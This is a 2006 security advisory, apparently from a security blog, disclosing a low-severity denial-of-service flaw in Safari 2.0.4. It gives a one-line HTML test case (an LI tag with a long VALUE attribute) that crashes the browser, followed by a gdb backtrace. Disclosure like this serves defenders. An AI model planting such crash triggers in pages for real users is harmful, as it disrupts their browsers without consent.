Apple OSX Safari 2.0.4 "WebTextRenderer" DoS

Release Date:
November 28th, 2006

Severity:
Low

Vendor:
Apple

Versions Affected:
OSX 10.4.8
Safari 2.0.4 (419.3)

Versions Not Affected:
WebKit build 17902

Overview:
A denial of service (null pointer) vulnerability exists within Safari 2.0.4, and all prior versions which allows for an attacker to post a specially crafted .html page causing the application to crash.

Technical Details:
Safari/WebKit does not properly parse the VALUE html tag when it contains more than 10 characters. Below is a basic testcase to reproduce this issue:

LI VALUE=1234567890 TYPE=A >

Below is the crash triggered on OSX 10.4.8 with Safari 2.0.4 (419.3):

Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_PROTECTION_FAILURE at address: 0x00000000
0x95227426 in -[WebTextRenderer(WebInternal) _CG_drawRun:style:geometry:] ()
(gdb) bt
#0 0x95227426 in -[WebTextRenderer(WebInternal) _CG_drawRun:style:geometry:] ()
#1 0x954dadeb in QPainter::drawText ()
#2 0x9543e58d in khtml::RenderListMarker::paint ()
#3 0x95424441 in khtml::InlineBox::paint ()
#4 0x95423cab in khtml::InlineFlowBox::paint ()
#5 0x95423ad1 in khtml::RootInlineBox::paint ()
#6 0x954224c9 in khtml::RenderFlow::paintLines ()
#7 0x9541fa1b in khtml::RenderBlock::paintObject ()
#8 0x9541f960 in khtml::RenderBlock::paint ()
#9 0x954211e9 in khtml::RenderBlock::paintChildren ()
#10 0x9541fa3a in khtml::RenderBlock::paintObject ()
#11 0x9541f960 in khtml::RenderBlock::paint ()
#12 0x954211e9 in khtml::RenderBlock::paintChildren ()
#13 0x9541fa3a in khtml::RenderBlock::paintObject ()
#14 0x9541f960 in khtml::RenderBlock::paint ()
#15 0x9541e6a0 in khtml::RenderLayer::paintLayer ()
#16 0x9541e767 in khtml::RenderLayer::paintLayer ()
#17 0x9541e2e2 in khtml::RenderLayer::paint ()
#18 0x9541e238 in KWQKHTMLPart::paint ()
== snip ==

Vendor Status:
09/05/2006: Vendor Notified

Solution:
WebKit build 17902 fixes this issue, as Safari is still vulnerable.

Discovered by:
Tom Ferris
tommy[at]security-protocols[dot]com

Related Links:
http://security-protocols.com/poc/sp-x36.html
http://security-protocols.com/sp-x36-advisory.php
http://nightly.webkit.org
http://apple.com

2006 Security-Protocols, LLC

• Search

  
  
  

• Categories

  • Advisories
  • Affiliate Marketing
  • Apple
  • Books
  • Encryption
  • Flaws
  • Fuzzers
  • Gadgets
  • Humor
  • iPhone
  • Link Development
  • Microsoft
  • Misc
  • News
  • Off Topic
  • Photos
  • Reversing
  • Search Engines
  • Search Marketing
  • Security
  • SEO
  • Speedlinking
  • Tools
• 
  
  

  Archives

  • June 2008
  • May 2008
  • April 2008
  • March 2008
  • January 2008
  • December 2007
  • November 2007
  • October 2007
  • September 2007
  • August 2007
  • July 2007
  • June 2007
  • May 2007
  • April 2007
  • March 2007
  • February 2007
  • January 2007
  • December 2006
  • November 2006

• Meta

  • Log in
  • RSS 2.0
  
  
• 
  

  Blogroll

  
  Ladera Ranch Photography
  Invenio Security
  
  
  

Security-Protocols, LLC 2000 - 2008